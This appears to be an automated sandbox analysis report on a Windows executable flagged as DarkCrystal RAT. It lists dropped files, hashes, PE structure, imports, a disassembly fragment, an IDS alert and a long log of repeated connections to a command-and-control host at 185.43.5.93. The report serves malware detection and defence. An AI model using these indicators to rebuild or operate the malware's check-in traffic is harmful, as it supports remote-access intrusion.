                                                            Preview:LXVGu9BQitjxjXE7fuJKEtiOi0B5pWmxaIyddEshUzoaisIBUGYqZwhbyGh47GkMGwXajldaBlzPFIpzsAkj75XolWoXgyjNPcTwVrbtm8py6SWqbsL6gAOKZtzM6G4MBm9ny3eAi169QjsSA75ynnrPOIWl1PwgEcwTSs2iNKXpDO40BhM9KFjY5uZpg2JTEZ5xxY9RFXkcPBL9OgkUCxW82XYiTNBVBDknSGCmh54weHJ3iZaARyRRD75ZAb71WPaLbirHd8xH2kdvOf94wBDMwSkVLnmF7CaPq7bArTgTAKYddKLebCFVLNZJ7W50VrJ0JOEQD8NceuMm3H1BbHo56FDciSDVXq7TAiTPF4bczm0bBwP0e4YODN3ELlsv51Fyw2lVxm6gqLGUOlavCM0dRtPxoODdMqg7hBpIK4C281i2Hj0jK6stBlhDnyqjicU9oIxM6RkHK7fZLWpFYeSQ7x65elfWNdTfhiN9vnm2VljDGI1QJlLEJEC0M2rUwO4qo91nIpTu1Z4WO2yWtOMlSPWdfXx36SGGq2ZHQOHdSbMtJqmTEVkhBSYYmYHv2ZyjTxpWdqGfGtS1CnUyudzkriFXdBf2GWk3mnZVAQ0XOFaS
                                                            Process:C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):691200
                                                            Entropy (8bit):5.5554988350478975
                                                            Encrypted:false
                                                            SSDEEP:12288:C9X1yJ7/pZY7fiCI/YBfULiXPrQfkXmm1RhdLB9XFy+nM6D+:CVc7EaCQYBfcE1ZM6D+
                                                            MD5:314420BAC969BCFB9510A0E8CC3686D6
                                                            SHA1:66F1D0A60A2727970476A105C88883F37270E30F
                                                            SHA-256:38B9CC3CCAE02C270E3D62E62E3B3B40E90AD7F898372B8A5035445BA32F4B26
                                                            SHA-512:DEBF908ADD95AA0849451AEF830E5E71724247D352DCB5DAD6B02DCA0D54E4E915A9430DE80D970A4E7EF3749EB2FC7C6FA7839348D84F546D5934D713E7569C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. ..............................R.....@.....................................S.......p............................................................................ ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B.......................H.......T...d...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                            Process:C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe
                                                            File Type:ASCII text, with very long lines (648), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):648
                                                            Entropy (8bit):5.866598649361759
                                                            Encrypted:false
                                                            SSDEEP:12:51dqxEFEn8C4X+FEaLMMuRffj9CRXbYzpQIWOcgFjQI3DgQTNcMS:51dqxNLDFPMPfcRrPIWhI3DBfS
                                                            MD5:B476E6901BB671AD2D30321EAFF23D4A
                                                            SHA1:530DE955650DB312C1CF542FE4A84593ABF8BEF6
                                                            SHA-256:8AFD38BC7EEB5747391D9C9E72B690DC65AB5C89FDEF8F7BB10296273BCA7EE2
                                                            SHA-512:D9CFEC5B728B3B704EEDC15E17250296C5CFDD223B56C8D69200CF68884326B9578767A4AAA8E5AE78E2363CE3A45134CDB0E8EFA5C3DCF5C0FFE8A841CFA5DB
                                                            Malicious:false
                                                            Preview:BtXFFkC8lCcwhSyoHvJocuSVgoH5qcpGxWcGK9apzRuY142EpwyeevLQaCjbdGRIWV8KzrdIUeyLA3elwCQ4oLmCLLqIZ9Mt9lCf5rP8SpJA69Qgh8oa0XeLt69nBVsVREMY19pEwSm8BlFL5JkbVv3lH0v9rl766ys2x1piSjnhugKH0ys1uRAfLkRBNpXLVpBN3NXDeCIvHV0lqoJ33FMpyNqNknUmMcMFe7OnaoXsIOYztqVjgdRQdWYqgKc0rgioJvGsZfdOrdgjy0d4SvFsL5mIiiGPLhBmptq8jmJBACj9zy1qrii5bzdNI7K1ZNDJc34FKfUplEsIWnStrain9FLzPczlcSmx9Zg54vgLN2UWHV1fpaJ8oaKXsE0rqtNSc5I6HWy53WZGuys3lT6BInIjPIN04zfepB4MM4YSlNFRAEn3W6GWwLKzxjr8J8BE15at4grq5oZ4h0iKfTe8sIsd1FZmNZInMAaFo490PZaIwPR6Agd0eDVtN61zGEcgfwshadgkTosTrjrmxcmq5SJJoq2rCKtK64m9htgh92gzUCBnOPBocvlMni3tlziJ5hWx7sEE6ErCwTzlpPcxJFsLTaW80w6KUX4wqOqgK7rXEiaUsRDWWv90zLdgWFNJIgrY
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:MS Windows registry file, NT/2000 or above
                                                            Category:dropped
                                                            Size (bytes):1835008
                                                            Entropy (8bit):4.421586891696594
                                                            Encrypted:false
                                                            SSDEEP:6144:bSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNK0uhiTw:GvloTMW+EZMM6DFyY03w
                                                            MD5:F1965BC054E6D6EAF2DDFEAA3FDA9C45
                                                            SHA1:8DBFC4114B5C45A62D76E7B35FEF3585244F6ED9
                                                            SHA-256:3F8B5637CF18A68C5EBD061379F6F87D505FBECE70264814638E2A6F68FC7332
                                                            SHA-512:BAD53695BB16B9841D1A6B4844BE7F0C8DACFF7A6A8D37AA504C1F6064B422159EFB48D13EDEFBAAAA2B4E44C4F3A60DF5D526454EE438FDE6CA0ADC823DDD95
                                                            Malicious:false
                                                            Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...Z.J...............................................................................................................................................................................................................................................................................................................................................@.n........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\KyC6hVwU8Z.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1
                                                            Process:C:\Windows\System32\PING.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):502
                                                            Entropy (8bit):4.613979319612254
                                                            Encrypted:false
                                                            SSDEEP:12:Pkl5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:sfdUOAokItULVDv
                                                            MD5:032C705D3EE087290604BFC8E0242F88
                                                            SHA1:E7CB57DE13AC98A3C8735758A1C4294DB66543E5
                                                            SHA-256:6160273CADF8F850FB0EA0A535C233596D736ED11EFDF4FC1E09F687C46B64E2
                                                            SHA-512:EDE27B27A72F86E8F1AB727BED2CD1335BF1A8675B3ABE2B6D896999B3A8265905446F612BC7F86F2CC8C1B0585092BC74B36F5838809C85419A0A34CC6CDEE6
                                                            Malicious:false
                                                            Preview:..Pinging 066656 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.875768293601397
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:KyC6hVwU8Z.exe
                                                            File size:1'341'440 bytes
                                                            MD5:a8c535490feb18fdff588d94c0d8a889
                                                            SHA1:7e8660d2481014bdf84814273573b921202c67e6
                                                            SHA256:5f4e7c6f450d28136464acb431e1ec1be7812fc72f9eeede3b767f4e0194801b
                                                            SHA512:d858372eb3f87af450b33ecbbb989b97a11dfc4cfd0ae7aee612b43b015b1ff23a2fabcccd0f751fdd78278549a623a895efebcc50964155c15aa1f1e56191dc
                                                            SSDEEP:24576:4sQst5PapBfSRvZ2acs9504+O4cgjqOM0JrK1PxNhiFlGHDTyoy9mX5BifNpttmw:4CZ8WOs50Z3NjnM0J4DhiHIDW9mXyfNt
                                                            TLSH:78551283F5A340A3F79354B01B24C9E5C419BDB37B151CCB61588159AAF4ACBCB7BA23
                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...w.$g.............................d............@.......................................@.....................................(..
                                                            Icon Hash:00928e8e8686b000
                                                            Entrypoint:0x4464d0
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows cui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6724E277 [Fri Nov 1 14:15:19 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:0
                                                            File Version Major:6
                                                            File Version Minor:0
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:0
                                                            Import Hash:79c892efe640fd61fcdafaed00816c87
                                                            Instruction
                                                            call 00007FAA3C7DE62Ah
                                                            jmp 00007FAA3C7DE48Dh
                                                            mov ecx, dword ptr [004635E0h]
                                                            push esi
                                                            push edi
                                                            mov edi, BB40E64Eh
                                                            mov esi, FFFF0000h
                                                            cmp ecx, edi
                                                            je 00007FAA3C7DE626h
                                                            test esi, ecx
                                                            jne 00007FAA3C7DE648h
                                                            call 00007FAA3C7DE651h
                                                            mov ecx, eax
                                                            cmp ecx, edi
                                                            jne 00007FAA3C7DE629h
                                                            mov ecx, BB40E64Fh
                                                            jmp 00007FAA3C7DE630h
                                                            test esi, ecx
                                                            jne 00007FAA3C7DE62Ch
                                                            or eax, 00004711h
                                                            shl eax, 10h
                                                            or ecx, eax
                                                            mov dword ptr [004635E0h], ecx
                                                            not ecx
                                                            pop edi
                                                            mov dword ptr [004635DCh], ecx
                                                            pop esi
                                                            ret
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 14h
                                                            and dword ptr [ebp-0Ch], 00000000h
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            and dword ptr [ebp-08h], 00000000h
                                                            push eax
                                                            call dword ptr [00461FB8h]
                                                            mov eax, dword ptr [ebp-08h]
                                                            xor eax, dword ptr [ebp-0Ch]
                                                            mov dword ptr [ebp-04h], eax
                                                            call dword ptr [00461F78h]
                                                            xor dword ptr [ebp-04h], eax
                                                            call dword ptr [00461F74h]
                                                            xor dword ptr [ebp-04h], eax
                                                            lea eax, dword ptr [ebp-14h]
                                                            push eax
                                                            call dword ptr [00461FF8h]
                                                            mov eax, dword ptr [ebp-10h]
                                                            lea ecx, dword ptr [ebp-04h]
                                                            xor eax, dword ptr [ebp-14h]
                                                            xor eax, dword ptr [ebp-04h]
                                                            xor eax, ecx
                                                            leave
                                                            ret
                                                            mov eax, 00004000h
                                                            ret
                                                            push 00464B78h
                                                            call dword ptr [00461FD8h]
                                                            ret
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            mov al, 01h
                                                            ret
                                                            push 00030000h
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x61dc80x28.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x670000x1910.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5b7c00xc0.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x61f200x130.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x59e6a0x5a0005d580fc783dfdd8a266e091e082f30cfFalse0.66435546875data7.0802944473385505IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x5b0000x7eb40x8000a3f8ada3ed32443a7f4cdc8946ef07e5False0.459869384765625OpenPGP Public Key5.119166936059444IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x630000x226c0x10008e2085cae6a0e440569f70b4c52b96ecFalse0.484619140625data5.081762228755209IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .bss0x660000x80x20071b14cd0690fc82caf94afcf4d5a7de2False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x670000x19100x1a004b35946be7aa56a8bbb45bdb9cec7036False0.7639723557692307data6.366822996232983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            .back0x690000xe16000xe2600104d169661d0dd151a2654a312b3daa4False1.0003138373136389data7.999820672261007IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            DLLImport
                                                            KERNEL32.dllCloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSizeEx, GetFileType, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemFileCacheSize, GetSystemTimeAsFileTime, GlobalFindAtomA, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, RtlUnwind, SetEndOfFile, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObjectEx, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-12-10T07:33:14.232792+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.549867185.43.5.9380TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 10, 2024 07:33:12.724128008 CET4986780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:12.843532085 CET8049867185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:12.845129967 CET4986780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:12.846340895 CET4986780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:12.965934992 CET8049867185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:13.205267906 CET4986780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:13.324608088 CET8049867185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:14.185507059 CET8049867185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:14.232791901 CET4986780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:14.290899992 CET8049867185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:14.291258097 CET8049867185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:14.291363001 CET4986780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:14.324624062 CET4986780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:14.443985939 CET8049867185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:14.673285007 CET4986780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:14.727308035 CET4987280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:14.765646935 CET8049867185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:14.792711973 CET8049867185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:14.813779116 CET4986780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:14.846714020 CET8049872185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:14.846793890 CET4987280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:14.846919060 CET4987280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:14.966296911 CET8049872185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:15.131705046 CET8049867185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:15.173135042 CET4986780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:15.204730988 CET4987280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:15.206686020 CET4986780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:15.324193954 CET8049872185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:15.325932980 CET8049867185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:15.563961983 CET4986780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:15.647706985 CET8049867185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:15.683198929 CET8049867185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:15.683300018 CET8049867185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:15.688782930 CET4986780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:16.023825884 CET8049867185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:16.079421043 CET4986780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:16.186197042 CET8049872185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:16.235641956 CET4987280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:16.419662952 CET8049872185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:16.470015049 CET4987280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:16.679074049 CET4986780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:16.679430962 CET4987880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:16.682254076 CET4987280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:16.798774958 CET8049878185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:16.798794985 CET8049867185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:16.798921108 CET4986780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:16.798930883 CET4987880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:16.799145937 CET4987880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:16.802017927 CET8049872185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:16.802264929 CET4987280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:16.900024891 CET4987880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:16.918601036 CET8049878185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:17.059612989 CET8049878185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:17.169691086 CET4988180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:17.289257050 CET8049881185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:17.289405107 CET4988180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:17.289678097 CET4988180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:17.409136057 CET8049881185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:17.642237902 CET4988180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:17.761527061 CET8049881185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:17.811039925 CET8049878185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:17.811151981 CET4987880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:18.735337019 CET8049881185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:18.854969978 CET8049881185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:18.855214119 CET4988180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:20.556297064 CET4988180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:20.658693075 CET4988880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:20.676089048 CET8049881185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:20.676238060 CET4988180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:20.778032064 CET8049888185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:20.778153896 CET4988880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:20.778395891 CET4988880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:20.897617102 CET8049888185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:21.060887098 CET4989080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:21.126540899 CET4988880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:21.180543900 CET8049890185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:21.180668116 CET4989080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:21.235797882 CET4989080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:21.245867014 CET8049888185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:21.355290890 CET8049890185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:21.595134020 CET4989080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:21.714468956 CET8049890185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:21.714592934 CET8049890185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:22.105420113 CET8049888185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:22.219984055 CET4988880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:22.341228008 CET8049888185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:22.423171997 CET4988880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:22.507153988 CET8049890185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:22.626286030 CET4989080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:22.743738890 CET8049890185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:22.938775063 CET4989080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:23.014800072 CET4988880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:23.014955997 CET4989080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:23.015228033 CET4989680192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:23.135121107 CET8049888185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:23.135171890 CET8049896185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:23.135226965 CET4988880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:23.135287046 CET4989680192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:23.135458946 CET4989680192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:23.135653019 CET8049890185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:23.135703087 CET4989080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:23.254662991 CET8049896185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:23.485750914 CET4989680192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:23.605092049 CET8049896185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:24.473460913 CET8049896185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:24.673162937 CET4989680192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:24.707362890 CET8049896185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:24.860646009 CET4989680192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:24.928284883 CET4989680192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:24.928484917 CET4990280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:25.047748089 CET8049902185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:25.047841072 CET4990280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:25.047846079 CET8049896185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:25.047904015 CET4989680192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:25.048027039 CET4990280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:25.167242050 CET8049902185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:25.407638073 CET4990280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:25.526962996 CET8049902185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:26.375740051 CET8049902185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:26.423154116 CET4990280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:26.611702919 CET8049902185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:26.746903896 CET4990280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:26.746968985 CET4990880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:26.866214037 CET8049908185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:26.866352081 CET4990880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:26.866449118 CET8049902185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:26.866535902 CET4990280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:26.866580963 CET4990880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:26.985784054 CET8049908185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:27.220108032 CET4990880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:27.339428902 CET8049908185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:27.758757114 CET4991080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:27.761042118 CET4990880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:27.878031015 CET8049910185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:27.878113031 CET4991080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:27.878232956 CET4991080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:27.885353088 CET8049908185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:27.885425091 CET4990880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:27.915184021 CET4991280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:27.997525930 CET8049910185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:28.034888983 CET8049912185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:28.036315918 CET4991280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:28.036525965 CET4991280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:28.156472921 CET8049912185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:28.235726118 CET4991080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:28.355371952 CET8049910185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:28.355386019 CET8049910185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:28.391923904 CET4991280192.168.2.5185.43.5.93
